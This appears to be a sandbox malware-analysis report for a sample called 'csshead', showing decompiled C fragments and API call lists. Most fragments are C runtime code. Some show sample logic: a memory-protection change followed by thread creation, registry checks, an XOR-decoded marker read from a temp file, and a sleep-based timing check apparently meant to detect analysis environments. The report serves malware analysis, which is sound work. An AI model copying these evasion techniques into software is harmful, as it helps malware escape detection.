    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E00422804(void* _a4) {
    				char _t3;
    				intOrPtr* _t4;
    				intOrPtr _t6;
    
    				if(_a4 != 0) {
    					_t3 = RtlFreeHeap( *0x4432a4, 0, _a4); // executed
    					_t12 = _t3;
    					if(_t3 == 0) {
    						_t4 = L004251B8(_t12);
    						_t6 = E00425176(GetLastError());
    						 *_t4 = _t6;
    						return _t6;
    					}
    				}
    				return _t3;
    			}
    0x0042280d 0x0042281a 0x00422820 0x00422822 0x00422825 0x00422833 0x00422839 0x00000000 0x0042283b 0x00422822 0x0042283d

    APIs
    • RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC), ref: 0042281A
    • GetLastError.KERNEL32(00000000,?,00425EDC), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 82%
    			E00409468(signed int __eax, void* __edx) {
    				long _v8;
    				intOrPtr _v117;
    				long _t9;
    
    				 *(__eax & 0x5c000075) =  *(__eax & 0x5c000075) + (__eax & 0x5c000075);
    				_v117 = _v117 + __edx;
    				E004090B8(__edx); // executed
    				CreateThread(0, 0, E00409124, 0, 0,  &_v8); // executed
    				_push(0); // executed
    				_t9 = RtlExitUserThread(); // executed
    				return _t9;
    			}
    0x0040946d 0x0040946f 0x00409474 0x0040948a 0x00409490 0x00409492 0x0040949a

    APIs
      • Part of subcall function 004090B8: VirtualProtect.KERNELBASE(00401BD8,-00007E8C,00000040,00409545,?,?,00409479,?,?,00409545), ref: 004090D9
    • CreateThread.KERNEL32(00000000,00000000,00409124,00000000,00000000,00409545), ref: 0040948A
    • RtlExitUserThread.NTDLL(00000000,?,?,00409545), ref: 00409492
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 75%
    			E00409470() {
    				long _v8;
    				long _t5;
    				void* _t6;
    
    				E004090B8(_t6); // executed
    				CreateThread(0, 0, E00409124, 0, 0,  &_v8); // executed
    				_push(0); // executed
    				_t5 = RtlExitUserThread(); // executed
    				return _t5;
    			}
    0x00409474 0x0040948a 0x00409490 0x00409492 0x0040949a

    APIs
      • Part of subcall function 004090B8: VirtualProtect.KERNELBASE(00401BD8,-00007E8C,00000040,00409545,?,?,00409479,?,?,00409545), ref: 004090D9
    • CreateThread.KERNEL32(00000000,00000000,00409124,00000000,00000000,00409545), ref: 0040948A
    • RtlExitUserThread.NTDLL(00000000,?,?,00409545), ref: 00409492
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 81%
    			E004070E5(void* __ecx) {
    				signed char _v8;
    				void* _v12;
    				char _v16;
    				char* _v20;
    				void* _v24;
    				void* _v28;
    				char _v285;
    				intOrPtr _t31;
    				intOrPtr _t38;
    				void* _t44;
    				intOrPtr _t50;
    				signed int _t53;
    
    				 *0x237c1fdf = 0xeb;
    				asm("das");
    				 *(__ecx - 0x24) =  *(__ecx - 0x24) >> 0x41;
    				 *0x000000EB =  *((intOrPtr*)(0xeb)) + 0xeb;
    				 *((intOrPtr*)(0xeb)) =  *((intOrPtr*)(0xeb)) + 0xeb;
    				asm("scasd");
    				asm("adc eax, 0xdf023c78");
    				 *0x4e =  *0x4e + 0x4e;
    				_v8 = 0;
    				_t31 =  *0x40a564; // 0x4070d0
    				_v20 = E00403F38(_t31);
    				RegOpenKeyExA(0x80000002, _v20, 0, 0x20019,  &_v12); // executed
    				E00401440(_v20);
    				_v16 = 0x101;
    				_t38 =  *0x40a568; // 0x4070f0
    				_v24 = E00403F38(_t38);
    				_t44 = E004038B0(_v12, _v24, 0, 0,  &_v285,  &_v16); // executed
    				if(_t44 == 0) {
    					_t50 =  *0x40a56c; // 0x407108
    					_v28 = E00403F38(_t50);
    					_t53 = E00401110( &_v285, _v28);
    					asm("sbb eax, eax");
    					_v8 =  ~(_t53 & 0xffffff00 | _t53 != 0x00000000);
    					E00401440(_v28);
    				}
    				E00401440(_v24);
    				E00403890(_v12);
    				return _v8;
    			}
    0x004070f2 0x004070f7 0x00407100 0x00407104 0x00407106 0x0040710f 0x00407110 0x00407116 0x00407123 0x00407126 0x00407130 0x00407147 0x00407150 0x00407155 0x0040715c 0x00407166 0x00407180 0x0040718a 0x0040718c 0x00407196 0x004071a2 0x004071ae 0x004071b0 0x004071b6 0x004071b6 0x004071be 0x004071c6 0x004071d1

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,?), ref: 00407147
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 00426368: GetModuleFileNameW.KERNEL32(00000000,00442CAA,00000104,00000001,?,00000000), ref: 00426404
      • Part of subcall function 00426368: _wcslen.LIBCMT ref: 00426433
      • Part of subcall function 00426368: _wcslen.LIBCMT ref: 00426440
      • Part of subcall function 00426368: GetStdHandle.KERNEL32(000000F4,00000001,?,00000000), ref: 004264B6
      • Part of subcall function 00426368: _strlen.LIBCMT ref: 004264F3
      • Part of subcall function 00426368: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00426502
      • Part of subcall function 004243C2: ExitProcess.KERNEL32 ref: 004243D3
    • RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
      • Part of subcall function 00427A95: RtlDecodePointer.NTDLL ref: 00427AA0
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E00422A18(void* __edx, void* __edi, void* __esi, long _a4) {
    				long _t6;
    				void* _t7;
    				void* _t11;
    				long _t14;
    				void* _t19;
    				void* _t21;
    				intOrPtr _t25;
    
    				_t19 = __edx;
    				_t14 = _a4;
    				if(_t14 > 0xffffffe0) {
    					L00427A95(_t14);
    					 *((intOrPtr*)(L004251B8(__eflags))) = 0xc;
    					__eflags = 0;
    					return 0;
    				}
    				while(1) {
    					_t27 =  *0x4432a4;
    					if( *0x4432a4 == 0) {
    						L00426517(_t19, _t27);
    						L00426368(_t19, 0x1e);
    						E004243C2(0xff);
    					}
    					if(_t14 == 0) {
    						_t6 = 1;
    						__eflags = 1;
    					} else {
    						_t6 = _t14;
    					}
    					_t7 = RtlAllocateHeap( *0x4432a4, 0, _t6); // executed
    					_t21 = _t7;
    					if(_t21 != 0) {
    						break;
    					}
    					_t25 = 0xc;
    					if( *0x4432ac == _t7) {
    						 *((intOrPtr*)(L004251B8(__eflags))) = _t25;
    						L12:
    						 *((intOrPtr*)(L004251B8(_t31))) = _t25;
    						break;
    					}
    					_t11 = L00427A95(_t14);
    					_t31 = _t11;
    					if(_t11 != 0) {
    						continue;
    					}
    					goto L12;
    				}
    				return _t21;
    			}
    0x00422a18 0x00422a1e 0x00422a24 0x00422a96 0x00422aa1 0x00422aa7 0x00000000 0x00422aa7 0x00422a28 0x00422a28 0x00422a2f 0x00422a31 0x00422a38 0x00422a42 0x00422a48 0x00422a4b 0x00422a53 0x00422a53 0x00422a4d 0x00422a4d 0x00422a4d 0x00422a5d 0x00422a63 0x00422a67 0x00000000 0x00000000 0x00422a6b 0x00422a72 0x00422a86 0x00422a88 0x00422a8d 0x00000000 0x00422a8d 0x00422a75 0x00422a7b 0x00422a7d 0x00000000 0x00000000 0x00000000 0x00422a7f 0x00000000

    APIs
      • Part of subcall function 00426368: GetModuleFileNameW.KERNEL32(00000000,00442CAA,00000104,00000001,00000000,?), ref: 00426404
      • Part of subcall function 00426368: _wcslen.LIBCMT ref: 00426433
      • Part of subcall function 00426368: _wcslen.LIBCMT ref: 00426440
      • Part of subcall function 00426368: GetStdHandle.KERNEL32(000000F4,00000001,00000000,?), ref: 004264B6
      • Part of subcall function 00426368: _strlen.LIBCMT ref: 004264F3
      • Part of subcall function 00426368: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00426502
      • Part of subcall function 004243C2: ExitProcess.KERNEL32 ref: 004243D3
    • RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042A0F0,?,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6), ref: 00422A5D
      • Part of subcall function 00427A95: DecodePointer.KERNEL32(?,0042B008,00000001,00000000,?,0042A13A,00000214,00000001,00000000,00000000,00000000,?,00425E9D,00000001,00000214), ref: 00427AA0
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 93%
    			E00407118(void* __ecx) {
    				signed char _v8;
    				void* _v12;
    				char _v16;
    				char* _v20;
    				void* _v24;
    				void* _v28;
    				char _v285;
    				intOrPtr _t23;
    				intOrPtr _t30;
    				void* _t36;
    				intOrPtr _t42;
    				signed int _t45;
    
    				_v8 = 0;
    				_t23 =  *0x40a564; // 0x4070d0
    				_v20 = E00403F38(_t23);
    				RegOpenKeyExA(0x80000002, _v20, 0, 0x20019,  &_v12); // executed
    				E00401440(_v20);
    				_v16 = 0x101;
    				_t30 =  *0x40a568; // 0x4070f0
    				_v24 = E00403F38(_t30);
    				_t36 = E004038B0(_v12, _v24, 0, 0,  &_v285,  &_v16); // executed
    				if(_t36 == 0) {
    					_t42 =  *0x40a56c; // 0x407108
    					_v28 = E00403F38(_t42);
    					_t45 = E00401110( &_v285, _v28);
    					asm("sbb eax, eax");
    					_v8 =  ~(_t45 & 0xffffff00 | _t45 != 0x00000000);
    					E00401440(_v28);
    				}
    				E00401440(_v24);
    				E00403890(_v12);
    				return _v8;
    			}
    0x00407123 0x00407126 0x00407130 0x00407147 0x00407150 0x00407155 0x0040715c 0x00407166 0x00407180 0x0040718a 0x0040718c 0x00407196 0x004071a2 0x004071ae 0x004071b0 0x004071b6 0x004071b6 0x004071be 0x004071c6 0x004071d1

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,?), ref: 00407147
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0042AFEF
      • Part of subcall function 00427A95: RtlDecodePointer.NTDLL ref: 00427AA0
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 86%
    			E0042AFAC(signed int _a4, signed int _a8, long _a12) {
    				void* _t10;
    				long _t11;
    				long _t12;
    				signed int _t13;
    				signed int _t17;
    				long _t19;
    				long _t24;
    
    				_t17 = _a4;
    				if(_t17 == 0) {
    					L3:
    					_t24 = _t17 * _a8;
    					__eflags = _t24;
    					if(_t24 == 0) {
    						_t24 = _t24 + 1;
    						__eflags = _t24;
    					}
    					goto L5;
    					L6:
    					_t10 = RtlAllocateHeap( *0x4432a4, 8, _t24); // executed
    					__eflags = 0;
    					if(0 == 0) {
    						goto L7;
    					}
    					L14:
    					return _t10;
    					goto L15;
    					L7:
    					__eflags =  *0x4432ac;
    					if( *0x4432ac == 0) {
    						_t19 = _a12;
    						__eflags = _t19;
    						if(_t19 != 0) {
    							 *_t19 = 0xc;
    						}
    					} else {
    						_t11 = L00427A95(_t24);
    						__eflags = _t11;
    						if(_t11 != 0) {
    							L5:
    							_t10 = 0;
    							__eflags = _t24 - 0xffffffe0;
    							if(_t24 > 0xffffffe0) {
    								goto L7;
    							} else {
    								goto L6;
    							}
    						} else {
    							_t12 = _a12;
    							__eflags = _t12;
    							if(_t12 != 0) {
    								 *_t12 = 0xc;
    							}
    							_t10 = 0;
    						}
    					}
    					goto L14;
    				} else {
    					_t13 = 0xffffffe0;
    					_t27 = _t13 / _t17 - _a8;
    					if(_t13 / _t17 >= _a8) {
    						goto L3;
    					} else {
    						 *((intOrPtr*)(L004251B8(_t27))) = 0xc;
    						return 0;
    					}
    				}
    				L15:
    			}
    0x0042afb1 0x0042afb6 0x0042afd3 0x0042afd8 0x0042afda 0x0042afdc 0x0042afde 0x0042afde 0x0042afde 0x00000000 0x0042afe6 0x0042afef 0x0042aff5 0x0042aff7 0x00000000 0x00000000 0x0042b02b 0x0042b02d 0x00000000 0x0042aff9 0x0042aff9 0x0042b000 0x0042b01e 0x0042b021 0x0042b023 0x0042b025 0x0042b025 0x0042b002 0x0042b003 0x0042b009 0x0042b00b 0x0042afdf 0x0042afdf 0x0042afe1 0x0042afe4 0x00000000 0x00000000 0x00000000 0x00000000 0x0042b00d 0x0042b00d 0x0042b010 0x0042b012 0x0042b014 0x0042b014 0x0042b01a 0x0042b01a 0x0042b00b 0x00000000 0x0042afb8 0x0042afbc 0x0042afbf 0x0042afc2 0x00000000 0x0042afc4 0x0042afc9 0x0042afd2 0x0042afd2 0x0042afc2 0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0042A13A,00000214,00000001,00000000,00000000,00000000,?,00425E9D,00000001,00000214), ref: 0042AFEF
      • Part of subcall function 00427A95: DecodePointer.KERNEL32(?,0042B008,00000001,00000000,?,0042A13A,00000214,00000001,00000000,00000000,00000000,?,00425E9D,00000001,00000214), ref: 00427AA0
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 100%
    			// Reads a 4-byte value from a file under %TEMP% and XORs it with a constant.
    			// E00406904 produces the file name (its subcalls are GetComputerNameA and
    			// RegOpenKeyExA, see the API list below); E004047AC reads the whole file
    			// (CreateFileA / GetFileSize / ReadFile) and returns the number of bytes
    			// read, or -1 on failure. The buffer is released with VirtualFree via E00401828.
    			E004069BC(void* __edx, void* __eflags) {
    				signed int _v8;
    				signed int* _v12;
    				intOrPtr _v16;
    				char _v273; // path buffer, 0x101 bytes
    				char _v338; // name buffer filled by E00406904
    				intOrPtr _t24;
    
    				_v8 = 0;
    				E00406904( &_v338); // executed
    				GetTempPathA(0x101,  &_v273);
    				E0040133C( &_v273,  &_v338); // string concatenation helper: temp path + name
    				_t24 = E004047AC( &_v273,  &_v12); // executed
    				_v16 = _t24;
    				if(_v16 != 0xffffffff) {
    					if(_v16 == 4) {
    						_v8 =  *_v12 ^ 0xcbc3f6a1; // decode the stored dword
    					}
    					E00401828(_v12);
    				}
    				return _v8; // 0 when the file is missing or not exactly 4 bytes long
    			}

    APIs
      • Part of subcall function 00406904: GetComputerNameA.KERNEL32(?,?), ref: 00406927
      • Part of subcall function 00406904: RegOpenKeyExA.KERNELBASE(80000002,00402174,00000000,00020119,?), ref: 00406965
    • GetTempPathA.KERNEL32(00000101,?), ref: 004069E1
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
      • Part of subcall function 004047AC: GetFileSize.KERNEL32(?,00000000), ref: 00404810
      • Part of subcall function 004047AC: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
      • Part of subcall function 004047AC: CloseHandle.KERNEL32(?), ref: 00404849
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • RtlEncodePointer.NTDLL(00000000), ref: 00424957
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 37%
    			// CRT start-up code, not sample logic: allocates a 32-entry table of function
    			// pointers (E0042A124 = allocation with retry), stores its encoded address
    			// (the call through 0x4331b8 is RtlEncodePointer, see the API list) in two
    			// globals and returns 0x18 on allocation failure. This matches the MSVC CRT
    			// _onexitinit routine (atexit table; _RT_ONEXIT = 24).
    			E00424946() {
    				intOrPtr _t2;
    				void* _t4;
    				signed int* _t7;
    
    				_t7 = E0042A124(0x20, 4);
    				_t2 =  *0x4331b8(_t7); // executed
    				 *0x444aa0 = _t2;
    				 *0x444a9c = _t2;
    				if(_t7 != 0) {
    					 *_t7 =  *_t7 & 0x00000000; // first table entry = NULL
    					return 0;
    				} else {
    					_t4 = 0x18;
    					return _t4;
    				}
    			}

    APIs
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000,00000001,00000214), ref: 0042A14C
    • RtlEncodePointer.NTDLL(00000000), ref: 00424957
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 100%
    			// Thin wrapper around RegQueryValueExA; the return address 00406992 in the
    			// API list places the caller inside E00406904, the registry helper used by
    			// E004069BC. Returns the LSTATUS unchanged.
    			E004038B0(void* _a4, char* _a8, int* _a12, int* _a16, char* _a20, int* _a24) {
    				long _v8;
    				long _t15;
    
    				_t15 = RegQueryValueExA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
    				_v8 = _t15;
    				return _v8;
    			}

    APIs
    • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 019638B7
    Memory Dump Source
    • Source File: 00000000.00000002.16599191923.01963000.00000040.sdmp, Offset: 01963000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1963000_csshead.jbxd
    APIs
    • RtlEncodePointer.NTDLL(5316C151), ref: 0042894A
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEncodePointer.NTDLL(0042F6FF,?,?,0042446F), ref: 0042894A
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,00424C7A), ref: 004276A7
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			// CRT heap initialisation: HeapCreate(flOptions = 0, dwInitialSize = 0x1000,
    			// dwMaximumSize = 0, i.e. growable). The handle is kept in the global at
    			// 0x4432a4; returns 1 on success, 0 on failure.
    			E0042769E() {
    				void* _t3;
    
    				_t3 = HeapCreate(0, 0x1000, 0); // executed
    				 *0x4432a4 = _t3;
    				return 0 | _t3 != 0x00000000;
    			}

    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,00424C7A), ref: 004276A7
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • RtlEncodePointer.NTDLL(Function_0001AEC5), ref: 0042AF4E
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEncodePointer.NTDLL(Function_0002AEC5,?,00423F7F,?,?,?,?,?,00000000,00000000,00000000), ref: 0042AF4E
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • RtlEncodePointer.NTDLL(00000000), ref: 00425D00
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEncodePointer.NTDLL(00000000,0042E431,00442C78,00000314,00000000,?,?,?,?,?,004264A5,00442C78,Microsoft Visual C++ Runtime Library,00012010), ref: 00425D00
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 100%
    			// Samples a value ten times (E00406B18) and accumulates it into _v24
    			// (E00406A74), sleeping 500 ms between samples (5 s in total). The
    			// accumulated value is then compared by E00406ACC (not shown on the page)
    			// against the 64-bit constants 40000 and 10; the function returns 0 only
    			// if both comparisons succeed, otherwise -1. A sleep-and-measure loop of
    			// this shape is typical of timing checks; the report's analysis advice
    			// already notes that the sample likely performs host environment checks.
    			E00406B60(intOrPtr* __eax, void* __ebx, void* __ecx, char* __edx) {
    				intOrPtr* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				char _v24;
    				intOrPtr _v28;
    				char _v32;
    				char* _t43; // was undeclared in the decompiler output
    
    				_t43 = __edx;
    				_v8 = __eax;
    				_v24 = 0;
    				_v20 = 0;
    				_v16 = 0; // loop counter
    				do {
    					E00406B18( &_v32, __ebx, __ecx, _t43);
    					_t43 =  &_v32;
    					E00406A74( &_v24,  &_v32); // accumulate the sample
    					Sleep(0x1f4); // executed; 0x1f4 = 500 ms
    					_v16 = _v16 + 1;
    				} while (_v16 != 0xa); // 10 iterations
    				_v12 = 0xffffffff; // default result: check failed
    				_v28 = 0;
    				_v32 = 0x9c40; // _v32/_v28 form the 64-bit constant 40000
    				 *_v8 = _v24; // hand the accumulated value back to the caller
    				if(E00406ACC( &_v32,  &_v24) != 0) {
    					_v28 = 0;
    					_v32 = 0xa; // 64-bit constant 10
    					if(E00406ACC( &_v24,  &_v32) != 0) {
    						_v12 = 0;
    					}
    				}
    				return _v12;
    			}

    APIs
    • Sleep.KERNELBASE(000001F4), ref: 00406B90
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
